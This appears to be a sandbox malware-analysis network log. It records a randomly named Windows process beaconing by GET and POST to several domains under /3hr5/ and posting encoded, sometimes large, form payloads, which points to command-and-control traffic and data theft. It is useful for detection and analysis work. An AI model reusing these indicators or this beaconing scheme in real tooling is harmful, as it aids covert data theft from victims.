                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.brls.money
                                                                                                                              Referer: http://www.brls.money/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 52912
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
Dec 4, 2023 15:25:49.052531004 CET | 99 | IN | HTTP/1.0 308 Permanent Redirect
Content-Typ
Data Raw:
Data Ascii:
Dec 4, 2023 15:25:49.052640915 CET | 66 | IN | Data Raw: 3a 20 74 65 78 74 2f 70 6c 61 69 6e
Data Ascii: : text/plain
Dec 4, 2023 15:25:49.052695036 CET | 64 | IN | Data Raw: 0d 0a 4c 6f 63 61 74 69 6f 6e
Data Ascii: Location
Dec 4, 2023 15:25:49.052743912 CET | 56 | IN | Data Raw: 3a 20
Data Ascii: :
Dec 4, 2023 15:25:49.052813053 CET | 84 | IN | Data Raw: 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 72 6c 73 2e 6d 6f 6e 65 79 2f 33 68 72 35 2f 0d 0a
Data Ascii: https://www.brls.money/3hr5/


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
52 | 192.168.11.20 | 50183 | 76.76.21.142 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:25:51.567981958 CET | 528 | OUT | GET /3hr5/?TZd=RBcnSiCg0exgPH7+amvyuffzGD4zp5v5QJzpEWhW15793hPIewihv82rGn5Qh8bR9T1h4/autzf2BuR5sC2Gt8s6p4k4sTzt/A==&1dr=yP5PQD38 HTTP/1.1
                                                                                                                              Host: www.brls.money
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
Dec 4, 2023 15:25:51.683687925 CET | 87 | IN | HTTP/1.0 308 Permanent Redirect
Dec 4, 2023 15:25:51.683716059 CET | 66 | IN | Data Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65
Data Ascii: Content-Type
Dec 4, 2023 15:25:51.683738947 CET | 56 | IN | Data Raw: 3a 20
Data Ascii: :
Dec 4, 2023 15:25:51.683772087 CET | 66 | IN | Data Raw: 74 65 78 74 2f 70 6c 61 69 6e 0d 0a
Data Ascii: text/plain
Dec 4, 2023 15:25:51.683794022 CET | 64 | IN | Data Raw: 4c 6f 63 61 74 69 6f 6e 3a 20
Data Ascii: Location:
Dec 4, 2023 15:25:51.683818102 CET | 200 | IN | Data Raw: 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 72 6c 73 2e 6d 6f 6e 65 79 2f 33 68 72 35 2f 3f 54 5a 64 3d 52 42 63 6e 53 69 43 67 30 65 78 67 50 48 37 2b 61 6d 76 79 75 66 66 7a 47 44 34 7a 70 35 76 35 51 4a 7a 70 45 57 68 57 31 35 37 39 33 68 50 49 65
Data Ascii: https://www.brls.money/3hr5/?TZd=RBcnSiCg0exgPH7+amvyuffzGD4zp5v5QJzpEWhW15793hPIewihv82rGn5Qh8bR9T1h4/autzf2BuR5sC2Gt8s6p4k4sTzt/A==&1dr=yP5PQD38
Dec 4, 2023 15:25:51.683986902 CET | 63 | IN | Data Raw: 0d 0a 52 65 66 72 65 73 68
Data Ascii: Refresh
Dec 4, 2023 15:25:51.684015989 CET | 242 | IN | Data Raw: 3a 20 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 72 6c 73 2e 6d 6f 6e 65 79 2f 33 68 72 35 2f 3f 54 5a 64 3d 52 42 63 6e 53 69 43 67 30 65 78 67 50 48 37 2b 61 6d 76 79 75 66 66 7a 47 44 34 7a 70 35 76 35 51 4a 7a 70 45 57 68 57 31
Data Ascii: : 0;url=https://www.brls.money/3hr5/?TZd=RBcnSiCg0exgPH7+amvyuffzGD4zp5v5QJzpEWhW15793hPIewihv82rGn5Qh8bR9T1h4/autzf2BuR5sC2Gt8s6p4k4sTzt/A==&1dr=yP5PQD38server: VercelRedirecting...


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
53 | 192.168.11.20 | 50184 | 54.36.145.173 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:25:59.909645081 CET | 535 | OUT | GET /3hr5/?TZd=5u0YN/vG2OQgb1C/S61rdtzCPX+hVrwZfQNDBdV1y3YbCYVEIx2nSMW53Cy3Ic7FhoOGTcSXNHOgJli1CYTDFI4tCK1dqGPzQQ==&1dr=yP5PQD38 HTTP/1.1
                                                                                                                              Host: www.hormigonesmil.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
Dec 4, 2023 15:26:02.051954031 CET | 775 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                              date: Mon, 04 Dec 2023 14:26:01 GMT
                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                              transfer-encoding: chunked
                                                                                                                              server: Apache
                                                                                                                              x-powered-by: PHP/7.4
                                                                                                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                              cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                              wpo-cache-status: not cached
                                                                                                                              wpo-cache-message: In the settings, caching is disabled for matches for one of the current request's GET parameters
                                                                                                                              x-redirect-by: WordPress
                                                                                                                              location: http://hormigonesmil.com/3hr5/?TZd=5u0YN/vG2OQgb1C/S61rdtzCPX+hVrwZfQNDBdV1y3YbCYVEIx2nSMW53Cy3Ic7FhoOGTcSXNHOgJli1CYTDFI4tCK1dqGPzQQ==&1dr=yP5PQD38
                                                                                                                              x-iplb-request-id: BF60E3DC:C408_362491AD:0050_656DE178_114DD5:6292
                                                                                                                              x-iplb-instance: 52473
                                                                                                                              connection: close
                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
54 | 192.168.11.20 | 50185 | 74.208.236.243 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:26:15.404470921 CET | 816 | OUT | POST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.homesteadmath.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.homesteadmath.com
                                                                                                                              Referer: http://www.homesteadmath.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 184
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Raw: 54 5a 64 3d 50 35 43 65 76 56 56 54 71 39 7a 6f 63 4a 43 38 54 4f 44 30 5a 53 47 57 45 48 33 78 68 43 63 30 43 53 62 58 7a 71 30 64 61 4c 36 30 54 76 35 34 39 67 51 35 48 6c 34 75 46 7a 69 2f 63 30 35 68 2b 52 77 43 73 4d 44 38 2b 6d 33 38 50 72 37 51 78 61 4d 50 71 31 78 37 2b 31 2f 33 70 42 71 69 50 77 43 46 35 4a 58 78 31 4d 43 41 54 54 53 79 44 68 71 44 57 37 5a 66 54 72 76 51 73 61 4e 6f 79 77 78 36 66 36 43 58 4b 4a 65 4b 68 35 37 44 53 51 4d 61 64 66 72 43 68 64 73 77 5a 77 66 6b 63 74 44 76 4c 6d 32 72 35 73 6c 4b 4b 42 7a 30 5a 41 3d 3d
                                                                                                                              Data Ascii: TZd=P5CevVVTq9zocJC8TOD0ZSGWEH3xhCc0CSbXzq0daL60Tv549gQ5Hl4uFzi/c05h+RwCsMD8+m38Pr7QxaMPq1x7+1/3pBqiPwCF5JXx1MCATTSyDhqDW7ZfTrvQsaNoywx6f6CXKJeKh57DSQMadfrChdswZwfkctDvLm2r5slKKBz0ZA==
Dec 4, 2023 15:26:15.535440922 CET | 634 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Content-Type: text/html
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              Date: Mon, 04 Dec 2023 14:26:15 GMT
                                                                                                                              Server: Apache
                                                                                                                              Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
55 | 192.168.11.20 | 50186 | 74.208.236.243 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:26:18.044367075 CET | 1156 | OUT | POST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.homesteadmath.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.homesteadmath.com
                                                                                                                              Referer: http://www.homesteadmath.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 524
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Dec 4, 2023 15:26:18.172804117 CET | 634 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Content-Type: text/html
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              Date: Mon, 04 Dec 2023 14:26:18 GMT
                                                                                                                              Server: Apache
                                                                                                                              Content-Encoding: gzip


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              56 | 192.168.11.20 | 50187 | 74.208.236.243 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Dec 4, 2023 15:26:20.686492920 CET | 6484 | OUT | POST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.homesteadmath.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.homesteadmath.com
                                                                                                                              Referer: http://www.homesteadmath.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 52912
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Dec 4, 2023 15:26:20.686585903 CET | 6484 | OUT
                                                                                                                              Dec 4, 2023 15:26:20.811073065 CET | 2626 | OUT
                                                                                                                              Dec 4, 2023 15:26:20.811235905 CET | 5198 | OUT
                                                                                                                              Dec 4, 2023 15:26:20.811400890 CET | 2626 | OUT
                                                                                                                              Dec 4, 2023 15:26:20.811578035 CET | 7770 | OUT
                                                                                                                              Dec 4, 2023 15:26:20.811744928 CET | 5198 | OUT
                                                                                                                              Dec 4, 2023 15:26:20.811986923 CET | 2626 | OUT
                                                                                                                              Dec 4, 2023 15:26:20.942143917 CET | 2626 | OUT
                                                                                                                              Dec 4, 2023 15:26:20.942338943 CET | 2626 | OUT
                                                                                                                              Dec 4, 2023 15:26:20.942500114 CET | 9829 | OUT
                                                                                                                              Dec 4, 2023 15:26:21.073816061 CET | 634 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Content-Type: text/html
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              Date: Mon, 04 Dec 2023 14:26:20 GMT
                                                                                                                              Server: Apache
                                                                                                                              Content-Encoding: gzip


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              57 | 192.168.11.20 | 50188 | 74.208.236.243 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Dec 4, 2023 15:26:23.341065884 CET | 535 | OUT | GET /3hr5/?TZd=C7q+sjkOjeHdW4KfX5XkOV+bb3qVpxl3Mz3wz487ZoyHEt9a0wBYazkTJk6RHURF+VscnNPsgG//B6D/+agfmiMJ8iKN4XKnaw==&1dr=yP5PQD38 HTTP/1.1
                                                                                                                              Host: www.homesteadmath.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Dec 4, 2023 15:26:23.470704079 CET | 824 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 626
                                                                                                                              Connection: close
                                                                                                                              Date: Mon, 04 Dec 2023 14:26:23 GMT
                                                                                                                              Server: Apache
                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              58 | 192.168.11.20 | 50189 | 216.40.34.41 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Dec 4, 2023 15:26:36.932413101 CET | 807 | OUT | POST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.ritualyoga.org
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.ritualyoga.org
                                                                                                                              Referer: http://www.ritualyoga.org/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 184
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
Dec 4, 2023 15:26:37.070503950 CET | 1328 | IN | HTTP/1.1 404 Not Found
server: nginx/1.14.2
date: Mon, 04 Dec 2023 14:26:37 GMT
content-type: text/html; charset=UTF-8
transfer-encoding: chunked
x-request-id: a3913f17-101e-49c4-83a6-652cbf43d254
x-runtime: 0.026389
content-encoding: gzip
connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
59 | 192.168.11.20 | 50190 | 216.40.34.41 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:26:39.573354006 CET | 1147 | OUT | POST /3hr5/ HTTP/1.1
Host: www.ritualyoga.org
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Origin: http://www.ritualyoga.org
Referer: http://www.ritualyoga.org/3hr5/
Connection: close
Content-Length: 524
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
Dec 4, 2023 15:26:39.714457035 CET | 1328 | IN | HTTP/1.1 404 Not Found
server: nginx/1.14.2
date: Mon, 04 Dec 2023 14:26:39 GMT
content-type: text/html; charset=UTF-8
transfer-encoding: chunked
x-request-id: cae8a3a7-a00a-4264-a8e5-fb60ddfc94fa
x-runtime: 0.028912
content-encoding: gzip
connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
60 | 192.168.11.20 | 50191 | 216.40.34.41 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:26:42.213639021 CET | 1340 | OUT | POST /3hr5/ HTTP/1.1
Host: www.ritualyoga.org
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Origin: http://www.ritualyoga.org
Referer: http://www.ritualyoga.org/3hr5/
Connection: close
Content-Length: 52912
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Ascii: zP21hePbni2yqGlGNywWLFJwBI7kngBpFF7ITfL1Hg7U0WG31qRjbopq2m/pE0MJdQRvG4PVo0wt5ngPxvkOnaednapi2jTOzSVLQ1KuZHX/y/CtPEXhuhVCvM2aKGZh/P4EouESK0ux0UR43negYx/pjnCpDTtq5eesvi5hNcGMw2PQb8BGi7aUcFR/h+CDw8bqYvAKh4hmuFHKAjnKdv5R4SWjzgehUDQX1XJCrp+FXcAtml/
                                                                                                                              Dec 4, 2023 15:26:42.597774982 CET1340OUTData Raw: 75 4a 4a 2b 4a 77 2f 6e 65 72 72 62 4a 33 31 69 51 6a 4e 6a 57 58 47 74 50 6c 77 50 4e 50 75 2f 6a 4d 51 35 2f 71 36 35 33 64 4a 37 39 54 6c 33 46 76 31 49 6b 4d 41 41 37 33 49 68 39 45 38 39 37 48 6e 71 59 68 75 69 6b 63 59 5a 57 54 64 4b 54 45
                                                                                                                              Data Ascii: uJJ+Jw/nerrbJ31iQjNjWXGtPlwPNPu/jMQ5/q653dJ79Tl3Fv1IkMAA73Ih9E897HnqYhuikcYZWTdKTEbz3KKGEC+0ryhqKB0o7PNZQvpc1mr4Sj0bxRlteUTIGBPahqoGUWsvlfWGVssQ+fjVa/zy3aHysSblyblbGTooJdU9aiuEawOOnQ3k5A0Qf/CJ8eAB9zVDGuDEYTX9/cprMYcMBeaTL4CsvDFJ9Z5anNQZvNpirg4
                                                                                                                              Dec 4, 2023 15:26:42.597949982 CET5962OUTData Raw: 67 45 30 38 48 79 30 61 5a 55 35 55 54 56 51 77 4b 34 42 55 51 2b 66 49 4b 46 64 64 52 4a 57 43 79 44 75 65 66 56 6f 78 39 44 4e 58 48 38 43 38 49 6a 4c 69 66 79 75 45 75 35 68 4c 32 72 78 63 70 59 6b 62 67 34 4a 6f 48 6a 56 66 37 4a 53 6d 7a 65
                                                                                                                              Data Ascii: gE08Hy0aZU5UTVQwK4BUQ+fIKFddRJWCyDuefVox9DNXH8C8IjLifyuEu5hL2rxcpYkbg4JoHjVf7JSmzeVWBQjvigpFzJgmSuj3XTxq8X7sgX1ksHYh+xoAa5Vxd7aGzzlrTPS33KoJu8TMovK07fPzQyeSSzQDZvE1WdPKXDH3q25kWJs4PjAwHYaIvnsElzRdCWcSE/RzNFpg8vKNZTNzNggqGOEqRREPZ30yP5CBC9+3gOH
                                                                                                                              Dec 4, 2023 15:26:42.736917973 CET | 1328 | IN | HTTP/1.1 404 Not Found
                                                                                                                              server: nginx/1.14.2
                                                                                                                              date: Mon, 04 Dec 2023 14:26:42 GMT
                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                              transfer-encoding: chunked
                                                                                                                              x-request-id: 0aeccb4e-37de-409d-8546-ac85cb27f1dd
                                                                                                                              x-runtime: 0.025843
                                                                                                                              content-encoding: gzip
                                                                                                                              connection: close


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              61 | 192.168.11.20 | 50192 | 216.40.34.41 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Dec 4, 2023 15:26:44.852792978 CET | 532 | OUT | GET /3hr5/?TZd=lEWuOoHaKeBJFGUazSVmb1afSNtW7c4aGAz9OG4Rjri38H/1L2LaU9Tlv3NTxVqSbHzxo0vPiJpjlRXDX4jfk8ag1kGN3tAtrg==&1dr=yP5PQD38 HTTP/1.1
                                                                                                                              Host: www.ritualyoga.org
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Dec 4, 2023 15:26:44.981888056 CET | 1328 | IN | HTTP/1.1 200 OK
                                                                                                                              server: nginx/1.14.2
                                                                                                                              date: Mon, 04 Dec 2023 14:26:44 GMT
                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                              transfer-encoding: chunked
                                                                                                                              x-frame-options: SAMEORIGIN
                                                                                                                              x-xss-protection: 1; mode=block
                                                                                                                              x-content-type-options: nosniff
                                                                                                                              x-download-options: noopen
                                                                                                                              x-permitted-cross-domain-policies: none
                                                                                                                              referrer-policy: strict-origin-when-cross-origin
                                                                                                                              etag: W/"cd0e473ec8f9e0891230436de0f95a52"
                                                                                                                              cache-control: max-age=0, private, must-revalidate
                                                                                                                              x-request-id: c44a6bb0-7201-47ec-90a9-9a55aa895399
                                                                                                                              x-runtime: 0.012841
                                                                                                                              connection: close


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              62 | 192.168.11.20 | 50193 | 37.97.254.27 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Dec 4, 2023 15:26:50.161400080 CET | 795 | OUT | POST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.rocsys.net
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.rocsys.net
                                                                                                                              Referer: http://www.rocsys.net/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 184
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Dec 4, 2023 15:26:50.330929041 CET | 242 | IN | HTTP/1.0 403 Forbidden
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html
                                                                                                                              Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              63 | 192.168.11.20 | 50194 | 37.97.254.27 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Dec 4, 2023 15:26:52.856779099 CET | 1135 | OUT | POST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.rocsys.net
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.rocsys.net
                                                                                                                              Referer: http://www.rocsys.net/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 524
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Dec 4, 2023 15:26:53.034671068 CET | 242 | IN | HTTP/1.0 403 Forbidden
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html
                                                                                                                              Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                                                              Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                                                              64    192.168.11.20    50195    37.97.254.27    80    8076    C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              Timestamp    Bytes transferred    Direction    Data
                                                                                                                              Dec 4, 2023 15:26:55.551474094 CET    1340    OUT    POST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.rocsys.net
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.rocsys.net
                                                                                                                              Referer: http://www.rocsys.net/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 52912
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Dec 4, 2023 15:26:55.551522970 CET    1340    OUT
                                                                                                                              Dec 4, 2023 15:26:55.551574945 CET    10342    OUT
                                                                                                                              Dec 4, 2023 15:26:55.721024036 CET    242    IN    HTTP/1.0 403 Forbidden
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html
                                                                                                                              Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
                                                                                                                              Dec 4, 2023 15:26:55.721137047 CET    2626    OUT
